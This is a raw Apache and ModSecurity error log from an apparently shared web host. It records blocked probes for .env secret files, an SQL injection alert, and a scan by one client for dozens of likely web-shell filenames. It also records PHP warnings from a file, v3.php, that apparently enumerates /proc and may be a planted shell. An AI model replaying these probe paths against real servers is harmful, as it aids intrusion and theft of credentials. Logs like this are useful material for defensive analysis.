[Tue May 12 04:16:16.203139 2026] [security2:error] [pid 1808852:tid 1808877] [client 176.65.139.233:60782] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.com"] [uri "/app/.env"] [unique_id "agKNcBfeipD4uoG21FoYWAAAABY"]
[Tue May 12 04:16:16.203346 2026] [security2:error] [pid 1808852:tid 1808877] [client 176.65.139.233:60782] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.com"] [uri "/app/.env"] [unique_id "agKNcBfeipD4uoG21FoYWAAAABY"]
[Tue May 12 04:16:17.870887 2026] [security2:error] [pid 1808852:tid 1808877] [client 176.65.139.233:60782] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.com"] [uri "/index.php"] [unique_id "agKNcBfeipD4uoG21FoYWAAAABY"]
[Tue May 12 04:16:18.002071 2026] [security2:error] [pid 1730207:tid 1730221] [client 176.65.139.233:60770] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecorporatefinance.fr"] [uri "/index.php"] [unique_id "agKNcDue9Sp-pIv_Bb6rBwAAAUw"]
[Tue May 12 04:16:19.924470 2026] [security2:error] [pid 1730175:tid 1730181] [client 176.65.139.232:47436] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/app/.env"] [unique_id "agKNc3o6NvB9WXx5V-6VlAAAAQQ"]
[Tue May 12 04:16:19.924632 2026] [security2:error] [pid 1730175:tid 1730181] [client 176.65.139.232:47436] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/app/.env"] [unique_id "agKNc3o6NvB9WXx5V-6VlAAAAQQ"]
[Tue May 12 04:16:20.747842 2026] [security2:error] [pid 1730175:tid 1730181] [client 176.65.139.232:47436] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/index.php"] [unique_id "agKNc3o6NvB9WXx5V-6VlAAAAQQ"]
[Tue May 12 04:16:22.648859 2026] [security2:error] [pid 1709071:tid 1709106] [client 74.7.227.26:42152] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: eda2405272a4dd9b80c87b9ae82f7c1b||1778553981||1778553621"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-includes/js/,b,"] [unique_id "agKNdrvMumyrWMfSu7rF1gAAANM"], referer: https://rentparadise.fr/wp-includes/js/',b,'
[Tue May 12 04:16:22.649122 2026] [security2:error] [pid 1709071:tid 1709106] [client 74.7.227.26:42152] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-includes/js/,b,"] [unique_id "agKNdrvMumyrWMfSu7rF1gAAANM"], referer: https://rentparadise.fr/wp-includes/js/',b,'
[Tue May 12 04:16:23.187025 2026] [security2:error] [pid 1709071:tid 1709106] [client 74.7.227.26:42152] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKNdrvMumyrWMfSu7rF1gAAANM"], referer: https://rentparadise.fr/wp-includes/js/',b,'
[Tue May 12 04:16:23.347091 2026] [security2:error] [pid 1709071:tid 1709106] [client 74.7.227.26:42152] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: eda2405272a4dd9b80c87b9ae82f7c1b||1778553981||1778553621"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/2021/02/17/bonjour-tout-le-monde/"] [unique_id "agKNd7vMumyrWMfSu7rF2AAAANM"], referer: https://rentparadise.fr/wp-includes/js/,b,
[Tue May 12 04:16:23.347301 2026] [security2:error] [pid 1709071:tid 1709106] [client 74.7.227.26:42152] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/2021/02/17/bonjour-tout-le-monde/"] [unique_id "agKNd7vMumyrWMfSu7rF2AAAANM"], referer: https://rentparadise.fr/wp-includes/js/,b,
[Tue May 12 04:16:23.711791 2026] [security2:error] [pid 1709071:tid 1709106] [client 74.7.227.26:42152] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKNd7vMumyrWMfSu7rF2AAAANM"], referer: https://rentparadise.fr/wp-includes/js/,b,
[Tue May 12 04:16:38.172312 2026] [ssl:error] [pid 1730175:tid 1730181] (EAI 2)Name or service not known: [client 43.133.69.37:42036] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 04:16:38.172360 2026] [ssl:error] [pid 1730175:tid 1730181] AH01941: stapling_renew_response: responder error
[Tue May 12 04:16:38.830992 2026] [security2:error] [pid 1730175:tid 1730181] [client 43.133.69.37:42036] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.happy-baby-box.fr"] [uri "/"] [unique_id "agKNhno6NvB9WXx5V-6VrwAAAQQ"], referer: http://www.happy-baby-box.fr
[Tue May 12 04:16:41.558221 2026] [ssl:error] [pid 1808852:tid 1808858] (EAI 2)Name or service not known: [client 43.133.69.37:47198] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 04:16:41.558264 2026] [ssl:error] [pid 1808852:tid 1808858] AH01941: stapling_renew_response: responder error
[Tue May 12 04:16:42.021682 2026] [security2:error] [pid 1808852:tid 1808858] [client 43.133.69.37:47198] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.happy-baby-box.fr"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "agKNihfeipD4uoG21FoYfwAAAAM"], referer: https://www.happy-baby-box.fr/
[Tue May 12 04:16:48.261250 2026] [security2:error] [pid 1730207:tid 1730210] [client 170.106.65.93:56488] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKNkDue9Sp-pIv_Bb6rjwAAAUE"]
[Tue May 12 04:17:04.296956 2026] [autoindex:error] [pid 1707624:tid 1707688] [client 74.7.242.4:46308] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: https://www.manhattan-studio.fr
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174196/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174196/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174196/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174196/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174196/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174196/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:17:23.390097 2026] [security2:error] [pid 1730207:tid 1730226] [client 43.134.5.186:52696] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agKNszue9Sp-pIv_Bb6rwAAAAVE"]
[Tue May 12 04:17:26.602138 2026] [security2:error] [pid 1730175:tid 1730201] [client 43.166.253.94:40500] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "217.113.192.26"] [uri "/"] [unique_id "agKNtno6NvB9WXx5V-6WMAAAARg"]
[Tue May 12 04:17:29.170436 2026] [security2:error] [pid 1730207:tid 1730229] [client 43.156.116.44:34674] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation/lodge-bali/chambre-bali/"] [unique_id "agKNuTue9Sp-pIv_Bb6rxwAAAVQ"]
[Tue May 12 04:17:33.753932 2026] [security2:error] [pid 1808852:tid 1808857] [client 43.156.116.44:40852] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/wp-content/uploads/2025/06/chambre-bali-scaled.jpeg"] [unique_id "agKNvRfeipD4uoG21FoYywAAAAI"], referer: https://rentparadise.fr/accommodation/lodge-bali/chambre-bali/
PHP Warning:  filesize(): stat failed for /proc/49/task/49/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/49/task/49/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/49/task/49/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/49/task/49/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/49/task/49/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/49/task/49/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1708008/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1708008/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1708008/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1708008/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1708008/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1708008/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:17:57.037085 2026] [authz_core:error] [pid 1730207:tid 1730209] [client 147.135.213.107:56154] AH01630: client denied by server configuration: /home/piregwan/public_html/flb/images/error_log
PHP Warning:  filesize(): stat failed for /proc/339/task/339/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/339/task/339/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/339/task/339/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/339/task/339/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/339/task/339/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/339/task/339/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:18:48.685111 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/class-t.api.php
[Tue May 12 04:18:48.777807 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/zwso.php
[Tue May 12 04:18:48.966482 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/class19.php
[Tue May 12 04:18:49.058760 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/class20.php
[Tue May 12 04:18:49.151361 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/admin.php
[Tue May 12 04:18:49.243598 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/randkeyword.php
[Tue May 12 04:18:49.335603 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/fwe.php
[Tue May 12 04:18:49.521554 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/g.php
[Tue May 12 04:18:49.615835 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/tx1.php
[Tue May 12 04:18:49.752341 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/xv.php
[Tue May 12 04:18:49.847447 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/x56.php
[Tue May 12 04:18:49.942177 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/htaccess.php
[Tue May 12 04:18:50.034221 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/readme.php
[Tue May 12 04:18:50.137106 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/x50.php
[Tue May 12 04:18:50.230493 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/fv.php
[Tue May 12 04:18:50.327753 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/file.php
[Tue May 12 04:18:50.428332 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/lsd.php
[Tue May 12 04:18:50.521405 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/as.php
[Tue May 12 04:18:50.613666 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/wsd.php
[Tue May 12 04:18:50.806487 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/gtc.php
[Tue May 12 04:18:50.902603 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/atx.php
[Tue May 12 04:18:50.994716 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/z60.php
[Tue May 12 04:18:51.095796 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/403.php
[Tue May 12 04:18:51.187966 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/m.php
[Tue May 12 04:18:51.280129 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/themes.php
[Tue May 12 04:18:51.573128 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/click.php
[Tue May 12 04:18:51.671777 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/install.php
[Tue May 12 04:18:51.764491 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/lv.php
[Tue May 12 04:18:51.858301 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/simple.php
[Tue May 12 04:18:51.951376 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/css.php
[Tue May 12 04:18:52.048279 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/cong.php
[Tue May 12 04:18:52.241966 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/cong.php
[Tue May 12 04:18:52.335379 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/w.php
[Tue May 12 04:18:52.430672 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/404.php
[Tue May 12 04:18:52.523051 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/ioxi-o.php
[Tue May 12 04:18:52.617869 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/0x.php
[Tue May 12 04:18:52.709984 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/css.php
[Tue May 12 04:18:52.802012 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/222.php
[Tue May 12 04:18:52.986408 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/admin.php
[Tue May 12 04:18:53.170669 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/classwithtostring.php
[Tue May 12 04:18:53.262728 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/abcd.php
[Tue May 12 04:18:53.364749 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/autoload_classmap.php
[Tue May 12 04:18:53.467718 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/inputs.php
[Tue May 12 04:18:53.560579 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/about.php
[Tue May 12 04:18:53.652808 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/alfa.php
[Tue May 12 04:18:53.780390 2026] [security2:error] [pid 1709071:tid 1709102] [client 43.135.133.194:49596] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-content/uploads/2019/11/6-miniatures-extrait-1.mp3"] [unique_id "agKODbvMumyrWMfSu7rGzwAAAM8"]
[Tue May 12 04:18:54.141815 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/manager.php
[Tue May 12 04:18:54.234726 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/item.php
[Tue May 12 04:18:54.418877 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/404.php
[Tue May 12 04:18:54.511119 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/mail.php
[Tue May 12 04:18:54.792322 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/sx.php
[Tue May 12 04:18:54.979748 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/alfa.php
[Tue May 12 04:18:55.072157 2026] [:error] [pid 1730207:tid 1730225] [client 20.151.0.198:29810] File does not exist: /home/nearoofr/public_html/1.php
